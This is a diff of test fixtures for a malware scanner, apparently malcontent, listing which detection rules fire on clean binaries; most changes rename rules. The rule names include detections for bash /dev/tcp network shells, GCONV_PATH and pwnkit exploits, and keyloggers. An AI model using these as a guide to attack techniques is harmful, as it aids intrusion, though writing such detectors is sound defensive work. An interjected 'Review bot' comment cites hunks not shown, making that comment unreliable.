@@ -10,7 +10,7 @@ data/random/insecure: low
 discover/group/lookup: medium
 discover/network/interface_get: low
 discover/network/netstat: medium
-discover/process/parent_pid_get: low
+discover/process/parent: low
 discover/processes/pgrep: medium
 discover/system/cpu_info: low
 discover/system/platform: low
diff --git a/tests/linux/clean/caddy.simple b/tests/linux/clean/caddy.simple
index 9970d0eed..15ad1c190 100644
--- a/tests/linux/clean/caddy.simple
+++ b/tests/linux/clean/caddy.simple
@@ -38,7 +38,7 @@ discover/cloud/aws_metadata: low
 discover/cloud/google_metadata: low
 discover/group/lookup: medium
 discover/network/mac_address: medium
-discover/process/parent_pid_get: low
+discover/process/parent: low
 discover/system/cpu_info: low
 discover/system/hostname_get: low
 discover/system/platform: medium
diff --git a/tests/linux/clean/chezmoi.simple b/tests/linux/clean/chezmoi.simple
index b0c8a3db3..25f8dd578 100644
--- a/tests/linux/clean/chezmoi.simple
+++ b/tests/linux/clean/chezmoi.simple
@@ -46,7 +46,7 @@ data/hash/md5: low
 data/random/insecure: low
 discover/group/lookup: medium
 discover/network/mac_address: medium
-discover/process/parent_pid_get: low
+discover/process/parent: low
 discover/system/cpu_info: low
 discover/system/hostname_get: low
 discover/system/platform: low
diff --git a/tests/linux/clean/chrome.simple b/tests/linux/clean/chrome.simple
index bbd2dfbff..f6058f27e 100644
--- a/tests/linux/clean/chrome.simple
+++ b/tests/linux/clean/chrome.simple
@@ -6,9 +6,9 @@ anti-behavior/LD_PROFILE: medium
 anti-static/obfuscation/obfuscate: low
 c2/addr/http_dynamic: medium
 c2/addr/ip: medium
+c2/addr/server: medium
 c2/discovery/ip_dns_resolver: medium
 c2/refs: medium
-c2/server_address: medium
 c2/tool_transfer/dropper: medium
 collect/archives/zip: medium
 collect/databases/leveldb: medium
@@ -38,8 +38,8 @@ data/hash/sha1: low
 data/random/insecure: low
 discover/network/interface_list: medium
 discover/network/mac_address: medium
-discover/process/name_get: medium
-discover/process/parent_pid_get: low
+discover/process/name: medium
+discover/process/parent: low
 discover/process/runtime_deps: medium
 discover/processes/list: medium
 discover/system/hostname_get: low
@@ -112,7 +112,6 @@ fs/watch: low
 hw/cpu: medium
 hw/dev/block_ice: medium
 hw/wireless: low
-impact/exploit/GCONV_PATH: low
 impact/ransom/decryptor: medium
 impact/remote_access/heartbeat: medium
 lateral/scan/target_ip: medium
diff --git a/tests/linux/clean/clickhouse.simple b/tests/linux/clean/clickhouse.simple
index 4868ecd1d..f2ee677c1 100644
--- a/tests/linux/clean/clickhouse.simple
+++ b/tests/linux/clean/clickhouse.simple
@@ -6,8 +6,8 @@
 anti-static/obfuscation/obfuscate: low
 c2/addr/http_dynamic: medium
 c2/addr/ip: medium
+c2/addr/server: medium
 c2/discovery/dyndns: medium
-c2/server_address: medium
 c2/tool_transfer/download: medium
 c2/tool_transfer/grayware: high
 collect/databases/leveldb: medium
@@ -45,7 +45,7 @@ discover/cloud/google_metadata: low
 discover/network/interface_get: low
 discover/network/interface_list: medium
 discover/permissions/capabilities: medium
-discover/process/name_get: medium
+discover/process/name: medium
 discover/process/runtime_deps: medium
 discover/processes/list: medium
 discover/system/cpu_info: low
diff --git a/tests/linux/clean/code-oss.md b/tests/linux/clean/code-oss.md
index eede9cc16..7ca00157c 100644
--- a/tests/linux/clean/code-oss.md
+++ b/tests/linux/clean/code-oss.md
@@ -11,9 +11,9 @@ | MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#hex_parse) | converts hex data to ASCII | [Buffer.from(padded, 'hex')](https://github.com/search?q=Buffer.from%28padded%2C+%27hex%27%29&type=code) | | MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [http://%s](http://%s) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[allow_port](https://github.com/search?q=allow_port&type=code)
[any_port](https://github.com/search?q=any_port&type=code)
[bIp](https://github.com/search?q=bIp&type=code)
[basic_port](https://github.com/search?q=basic_port&type=code)
[check_ip](https://github.com/search?q=check_ip&type=code)
[debugPort](https://github.com/search?q=debugPort&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[gIp](https://github.com/search?q=gIp&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[inspectPort](https://github.com/search?q=inspectPort&type=code)
[internalPort](https://github.com/search?q=internalPort&type=code)
[kPort](https://github.com/search?q=kPort&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[mIp](https://github.com/search?q=mIp&type=code)
[maxPort](https://github.com/search?q=maxPort&type=code)
[messagePort](https://github.com/search?q=messagePort&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[midi_port](https://github.com/search?q=midi_port&type=code)
[minPort](https://github.com/search?q=minPort&type=code)
[next_port](https://github.com/search?q=next_port&type=code)
[oIp](https://github.com/search?q=oIp&type=code)
[on_ip](https://github.com/search?q=on_ip&type=code)
[origin_port](https://github.com/search?q=origin_port&type=code)
[parentPort](https://github.com/search?q=parentPort&type=code)
[parent_port](https://github.com/search?q=parent_port&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[peer_port](https://github.com/search?q=peer_port&type=code)
[publicPort](https://github.com/search?q=publicPort&type=code)
[public_ip](https://github.com/search?q=public_ip&type=code)
[quic_ip](https://github.com/search?q=quic_ip&type=code)
[quic_port](https://github.com/search?q=quic_port&type=code)
[received_ip](https://github.com/search?q=received_ip&type=code)
[relatedPort](https://github.com/search?q=relatedPort&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[requestPort](https://github.com/search?q=requestPort&type=code)
[seq_port](https://github.com/search?q=seq_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[server_ip](https://github.com/search?q=server_ip&type=code)
[set_port](https://github.com/search?q=set_port&type=code)
[simple_port](https://github.com/search?q=simple_port&type=code)
[sourcePort](https://github.com/search?q=sourcePort&type=code)
[source_port](https://github.com/search?q=source_port&type=code)
[stun_port](https://github.com/search?q=stun_port&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[turn_port](https://github.com/search?q=turn_port&type=code)
[udp_port](https://github.com/search?q=udp_port&type=code)
[uv_ip](https://github.com/search?q=uv_ip&type=code)
[validatePort](https://github.com/search?q=validatePort&type=code) | +| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [_quic_drop_packets_with_changed_server_address](https://github.com/search?q=_quic_drop_packets_with_changed_server_address&type=code)
[server_address_](https://github.com/search?q=server_address_&type=code) | | MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#google_dns_ip) | contains Google Public DNS resolver IP | [8.8.4.4](https://github.com/search?q=8.8.4.4&type=code)
[8.8.8.8](https://github.com/search?q=8.8.8.8&type=code) | | MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#remote_control) | Uses terms that may reference remote control abilities | [remote control](https://github.com/search?q=remote+control&type=code) | -| MEDIUM | [c2/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/server_address.yara#server_address) | references a 'server address', possible C2 client | [_quic_drop_packets_with_changed_server_address](https://github.com/search?q=_quic_drop_packets_with_changed_server_address&type=code)
[server_address_](https://github.com/search?q=server_address_&type=code) | | MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [dropper](https://github.com/search?q=dropper&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [zip_writer](https://github.com/search?q=zip_writer&type=code) | | MEDIUM | [collect/databases/leveldb](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/leveldb.yara#leveldb) | accesses LevelDB databases | [LEVELDB_DATABASE](https://github.com/search?q=LEVELDB_DATABASE&type=code)
[LEVELDB_ITERATOR](https://github.com/search?q=LEVELDB_ITERATOR&type=code)
[LEVELDB_TRANSACTION](https://github.com/search?q=LEVELDB_TRANSACTION&type=code)
[LevelDBEH](https://github.com/search?q=LevelDBEH&type=code)
[LevelDBEnv](https://github.com/search?q=LevelDBEnv&type=code)
[LevelDBIH](https://github.com/search?q=LevelDBIH&type=code)
[LevelDBLeveledLock](https://github.com/search?q=LevelDBLeveledLock&type=code)
[LevelDBOpenErrors](https://github.com/search?q=LevelDBOpenErrors&type=code)
[LevelDBReadErrors](https://github.com/search?q=LevelDBReadErrors&type=code)
[LevelDBScopesKeyRange](https://github.com/search?q=LevelDBScopesKeyRange&type=code)
[LevelDBScopesMetadata](https://github.com/search?q=LevelDBScopesMetadata&type=code)
[LevelDBScopesUndoTask](https://github.com/search?q=LevelDBScopesUndoTask&type=code)
[LevelDBTransaction](https://github.com/search?q=LevelDBTransaction&type=code)
[LevelDBWrapper](https://github.com/search?q=LevelDBWrapper&type=code)
[LevelDBWriteErrors](https://github.com/search?q=LevelDBWriteErrors&type=code)
[MojoLevelDB](https://github.com/search?q=MojoLevelDB&type=code)
[OpenAndVerifyLevelDBDatabase](https://github.com/search?q=OpenAndVerifyLevelDBDatabase&type=code)
[OpenLevelDBScopes](https://github.com/search?q=OpenLevelDBScopes&type=code)
[indexed_db_leveldb_operations](https://github.com/search?q=indexed_db_leveldb_operations&type=code)
[lazy_leveldb](https://github.com/search?q=lazy_leveldb&type=code)
[leveldb_0x](https://github.com/search?q=leveldb_0x&type=code)
[leveldb_chrome](https://github.com/search?q=leveldb_chrome&type=code)
[leveldb_database](https://github.com/search?q=leveldb_database&type=code)
[leveldb_factory](https://github.com/search?q=leveldb_factory&type=code)
[leveldb_proto](https://github.com/search?q=leveldb_proto&type=code)
[leveldb_scopes](https://github.com/search?q=leveldb_scopes&type=code)
[leveldb_value_store](https://github.com/search?q=leveldb_value_store&type=code)
[proto_leveldb_wrapper](https://github.com/search?q=proto_leveldb_wrapper&type=code)
[transactional_leveldb_iterator](https://github.com/search?q=transactional_leveldb_iterator&type=code) | @@ -26,7 +26,7 @@ | MEDIUM | [data/embedded/base64_url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-url.yara#contains_base64_url) | Contains base64 url | [aHR0cDovL::$http](https://github.com/search?q=aHR0cDovL%3A%3A%24http&type=code)
[h0dHA6Ly::$http](https://github.com/search?q=h0dHA6Ly%3A%3A%24http&type=code)
[h0dHBzOi8v::$https](https://github.com/search?q=h0dHBzOi8v%3A%3A%24https&type=code)
[odHRwOi8v::$http](https://github.com/search?q=odHRwOi8v%3A%3A%24http&type=code)
[odHRwczovL::$https](https://github.com/search?q=odHRwczovL%3A%3A%24https&type=code) | | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [[](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code)
[ifconfig](https://github.com/search?q=ifconfig&type=code)
[networkInterfaces](https://github.com/search?q=networkInterfaces&type=code) | -| MEDIUM | [discover/process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | +| MEDIUM | [discover/process/name](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | | MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.arch](https://github.com/search?q=process.arch&type=code)
[process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code) | | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | @@ -104,7 +104,7 @@ | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | | LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | -| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | +| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | @@ -139,7 +139,6 @@ | LOW | [fs/tempdir/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir-create.yara#mkdtemp) | creates temporary directory | [mkdtemp](https://github.com/search?q=mkdtemp&type=code)
[temp dir](https://github.com/search?q=temp+dir&type=code) | | LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | | LOW | [hw/wireless](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/wireless.yara#bssid) | wireless network base station ID | [BSSID](https://github.com/search?q=BSSID&type=code) | -| LOW | [impact/exploit/GCONV_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/exploit/GCONV_PATH.yara#gconv_path) | references character conversion configuration | [GCONV_PATH](https://github.com/search?q=GCONV_PATH&type=code) | | LOW | [impact/ui/screen_capture](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/ui/screen-capture.yara#macos_screen_capture) | macos screen capture | [captureScreen](https://github.com/search?q=captureScreen&type=code) | | LOW | [net/dns](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns.yara#go_dns_refs) | Uses DNS (Domain Name Service) | [require('dns')](https://github.com/search?q=require%28%27dns%27%29&type=code) | | LOW | [net/dns/servers](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-servers.yara#go_dns_refs_local) | Examines local DNS servers | [resolv.conf](https://github.com/search?q=resolv.conf&type=code) | diff --git a/tests/linux/clean/containerd.simple b/tests/linux/clean/containerd.simple index aa2a81b85..216e3c50b 100644 --- a/tests/linux/clean/containerd.simple +++ b/tests/linux/clean/containerd.simple @@ -2,7 +2,7 @@ 3P/threat_hunting/hijacker: medium 3P/threat_hunting/privilegeescalation: medium c2/addr/ip: medium -c2/server_address: medium +c2/addr/server: medium collect/archives/zip: medium collect/databases/mysql: medium credential/password: low 
diff --git a/tests/linux/clean/default_config.json.simple b/tests/linux/clean/default_config.json.simple
index 0b0bb693b..da8770463 100644
--- a/tests/linux/clean/default_config.json.simple
+++ b/tests/linux/clean/default_config.json.simple
@@ -20,7 +20,7 @@ data/compression/bzip2: low
 data/compression/lzma: low
 data/compression/zstd: low
 data/encoding/base64: low
-discover/system/network: high
+discover/system/network: medium
 discover/system/platform: low
 discover/user/name_get: medium
 evasion/bypass_security/linux/iptables: medium
@@ -29,7 +29,6 @@ evasion/file/prefix: medium
 evasion/logging/acct: low
 evasion/process_injection/readelf: medium
 exec/plugin: low
-exec/shell/bash_dev_tcp: high
 exec/shell/bash_dev_udp: medium
 exec/shell/nohup: medium
 exec/system_controls/apparmor: medium
@@ -55,6 +54,7 @@ impact/exploit/cve: medium
 impact/remote_access/iptables: medium
 net/dns/servers: low
 net/download: medium
+net/ftp/t: low
 net/http/cookies: medium
 net/socket/connect: medium
 net/tcp/sftp: medium
diff --git a/tests/linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json.simple b/tests/linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json.simple
index 2fcc182fe..43b73b57d 100644
--- a/tests/linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json.simple
+++ b/tests/linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json.simple
@@ -1,7 +1,6 @@
 # linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json: medium
 3P/threat_hunting/seclists: medium
 impact/exploit: medium
-impact/exploit/GCONV_PATH: low
 impact/exploit/cve: medium
 impact/exploit/pwnkit: low
 impact/remote_access/agent: medium
diff --git a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple
index 59d257440..89da6b666 100644
--- a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple
+++ b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple
@@ -52,8 +52,8 @@ data/encoding/json_decode: low
 data/encoding/json_encode: low
 data/hash/md5: low
 discover/network/mac_address: medium
-discover/process/name_get: medium
-discover/process/parent_pid_get: low
+discover/process/name: medium
+discover/process/parent: low
 evasion/file/prefix: medium
 evasion/rootkit/refs: medium
 exec/cmd: medium
diff --git a/tests/linux/clean/kuma-cp.simple b/tests/linux/clean/kuma-cp.simple
index e81ca191a..6477bb5ab 100644
--- a/tests/linux/clean/kuma-cp.simple
+++ b/tests/linux/clean/kuma-cp.simple
@@ -3,7 +3,7 @@
 3P/threat_hunting/privilegeescalation: medium
 c2/addr/http_dynamic: medium
 c2/addr/ip: medium
-c2/server_address: medium
+c2/addr/server: medium
 c2/tool_transfer/download: medium
 collect/archives/zip: medium
 collect/databases/mysql: medium
diff --git a/tests/linux/clean/ld-2.27.so.simple b/tests/linux/clean/ld-2.27.so.simple
index 935e4f3f4..2b9e1489a 100644
--- a/tests/linux/clean/ld-2.27.so.simple
+++ b/tests/linux/clean/ld-2.27.so.simple
@@ -2,6 +2,7 @@
 anti-behavior/LD_DEBUG: medium
 anti-behavior/LD_PROFILE: medium
 discover/process/runtime_deps: medium
+discover/system/dev_full: medium
 evasion/hijack_execution/LD_LIBRARY_PATH: low
 evasion/hijack_execution/etc_ld.so.preload: medium
 fs/path/etc: low
@@ -10,7 +11,7 @@ fs/path/var_profile: medium
 fs/proc/self_exe: medium
 fs/proc/sys_kernel_osrelease: medium
 fs/tempdir: low
-impact/exploit/GCONV_PATH: low
+hw/dev/ubi: low
 net/url/embedded: low
 persist/shell/bash: medium
 sus/exclamation: medium
diff --git a/tests/linux/clean/libgcj.so.17.0.0.simple b/tests/linux/clean/libgcj.so.17.0.0.simple
index 6d80a5ff9..6fe699be2 100644
--- a/tests/linux/clean/libgcj.so.17.0.0.simple
+++ b/tests/linux/clean/libgcj.so.17.0.0.simple
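Review bot: `+hw/dev/ubi: low` on glibc's dynamic loader in the second ld-2.27.so hunk is a suspicious new hit, and the ls.x86_64.md hunk at the end of this chunk shows the same rule (`expected_ubi_users`) matching on the evidence string `Usage:`. If that string is what fires here as well, the rule (not part of this chunk) will match nearly any binary that prints a usage banner, so this fixture is cementing a false positive; anchoring the rule on a UBI-specific term, or requiring a second string alongside `Usage:`, would be the fix. The sbcl.sdiff hunk above also picks up `-hw/dev/ubi`, which is consistent with the rule being over-broad.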
@@ -18,13 +18,14 @@ data/hash/sha1: low
 data/hash/sha256: low
 data/hash/whirlpool: medium
 discover/network/interface_list: medium
-discover/process/name_get: medium
+discover/process/name: medium
 discover/system/cpu_info: low
 discover/system/hostname_get: low
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
 evasion/hijack_execution/LD_LIBRARY_PATH: low
+evasion/process_injection/ptrace: low
 exec/cmd: medium
 exec/conditional/LANG: low
 exec/dylib/address_check: low
@@ -51,7 +52,6 @@ fs/path/var: low
 fs/permission/modify: medium
 fs/proc/arbitrary_pid: medium
 fs/proc/mounts: medium
-fs/proc/pid_exe: medium
 fs/proc/stat: medium
 fs/tempdir: low
 fs/tempdir/TEMP: low
diff --git a/tests/linux/clean/libgcj.so.17.simple b/tests/linux/clean/libgcj.so.17.simple
index 62cf9ab5c..1ee600a0a 100644
--- a/tests/linux/clean/libgcj.so.17.simple
+++ b/tests/linux/clean/libgcj.so.17.simple
@@ -18,13 +18,14 @@ data/hash/sha1: low
 data/hash/sha256: low
 data/hash/whirlpool: medium
 discover/network/interface_list: medium
-discover/process/name_get: medium
+discover/process/name: medium
 discover/system/cpu_info: low
 discover/system/hostname_get: low
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
 evasion/hijack_execution/LD_LIBRARY_PATH: low
+evasion/process_injection/ptrace: low
 exec/cmd: medium
 exec/conditional/LANG: low
 exec/dylib/address_check: low
@@ -51,7 +52,6 @@ fs/path/var: low
 fs/permission/modify: medium
 fs/proc/arbitrary_pid: medium
 fs/proc/mounts: medium
-fs/proc/pid_exe: medium
 fs/proc/stat: medium
 fs/tempdir: low
 fs/tempdir/TEMP: low
diff --git a/tests/linux/clean/libsystemd.so.0.simple b/tests/linux/clean/libsystemd.so.0.simple
index 936565b97..a45fb292c 100644
--- a/tests/linux/clean/libsystemd.so.0.simple
+++ b/tests/linux/clean/libsystemd.so.0.simple
@@ -1,7 +1,7 @@
 # linux/clean/libsystemd.so.0: medium
 data/compression/lzma: low
 data/random/insecure: low
-discover/process/parent_pid_get: low
+discover/process/parent: low
 discover/process/runtime_deps: medium
 discover/user/USER: low
 evasion/file/location/var_run: medium
diff --git a/tests/linux/clean/ls.x86_64.md b/tests/linux/clean/ls.x86_64.md
index fe3d4731f..ffd6be373 100644
--- a/tests/linux/clean/ls.x86_64.md
+++ b/tests/linux/clean/ls.x86_64.md
@@ -7,5 +7,6 @@
 | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
 | LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) |
 | LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) |
+| LOW | [hw/dev/ubi](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/ubi.yara#expected_ubi_users) | expected ubi users | [Usage:](https://github.com/search?q=Usage%3A&type=code) |
 | LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) |
diff --git a/tests/linux/clean/lslogins.md b/tests/linux/clean/lslogins.md
index ede252252..cf3dff5a7 100644
--- a/tests/linux/clean/lslogins.md
+++ b/tests/linux/clean/lslogins.md
@@ -21,6 +21,7 @@
 | LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/log/btmp](https://github.com/search?q=%2Fvar%2Flog%2Fbtmp&type=code)
[/var/log/lastlog](https://github.com/search?q=%2Fvar%2Flog%2Flastlog&type=code)
[/var/log/wtmp](https://github.com/search?q=%2Fvar%2Flog%2Fwtmp&type=code)
[/var/run/nologin](https://github.com/search?q=%2Fvar%2Frun%2Fnologin&type=code) |
 | LOW | [fs/tempdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir.yara#tempdir) | looks up location of temp directory | [TMPDIR](https://github.com/search?q=TMPDIR&type=code) |
 | LOW | [fs/tempdir/TMPDIR](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TMPDIR.yara#TMPDIR) | TMPDIR | [TMPDIR](https://github.com/search?q=TMPDIR&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
+| LOW | [hw/dev/ubi](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/ubi.yara#expected_ubi_users) | expected ubi users | [Usage:](https://github.com/search?q=Usage%3A&type=code) |
 | LOW | [os/fd/sendfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/sendfile.yara#sendfile) | [transfer data between file descriptors](https://man7.org/linux/man-pages/man2/sendfile.2.html) | [sendfile](https://github.com/search?q=sendfile&type=code) |
 | LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setregid) | set real and effective group ID of process | [setregid](https://github.com/search?q=setregid&type=code) |
 | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) |
diff --git a/tests/linux/clean/mongosh.simple b/tests/linux/clean/mongosh.simple
index cd28c793c..b1601c57a 100644
--- a/tests/linux/clean/mongosh.simple
+++ b/tests/linux/clean/mongosh.simple
@@ -4,8 +4,8 @@ anti-static/obfuscation/hex: medium
 anti-static/obfuscation/obfuscate: low
 c2/addr/http_dynamic: medium
 c2/addr/ip: medium
+c2/addr/server: medium
 c2/discovery/ip_dns_resolver: medium
-c2/server_address: medium
 collect/archives/unarchive: medium
 collect/databases/postgresql: medium
 collect/databases/sqlite: medium
@@ -39,8 +39,8 @@ discover/group/lookup: medium
 discover/network/interface_get: low
 discover/network/interface_list: medium
 discover/network/mac_address: medium
-discover/process/name_get: medium
-discover/process/parent_pid_get: low
+discover/process/name: medium
+discover/process/parent: low
 discover/processes/list: medium
 discover/system/hostname_get: low
 discover/system/platform: medium
diff --git a/tests/linux/clean/nvim.simple b/tests/linux/clean/nvim.simple
index 71aa9e4b5..7d856fd17 100644
--- a/tests/linux/clean/nvim.simple
+++ b/tests/linux/clean/nvim.simple
@@ -1,7 +1,6 @@
 # linux/clean/nvim: medium
 3P/threat_hunting/hrshell: medium
 c2/addr/server: medium
-c2/server_address: medium
 collect/databases/mysql: medium
 collect/databases/sqlite: medium
 credential/cloud/aws: medium
diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md
index d707b5e2f..609fc4915 100644
--- a/tests/linux/clean/pandoc.md
+++ b/tests/linux/clean/pandoc.md
@@ -6,8 +6,8 @@
 | MEDIUM | [3P/threat_hunting/keylogger](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#keylogger_keyword_offensive_tool_keyword) | [references 'keylogger keyword' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [KeyLogger](https://github.com/search?q=KeyLogger&type=code) |
 | MEDIUM | [3P/threat_hunting/slowloris](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#SlowLoris_offensive_tool_keyword) | [references 'SlowLoris' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [Slowloris](https://github.com/search?q=Slowloris&type=code) |
 | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bindPort](https://github.com/search?q=bindPort&type=code)
[blIp](https://github.com/search?q=blIp&type=code)
[client_ip](https://github.com/search?q=client_ip&type=code)
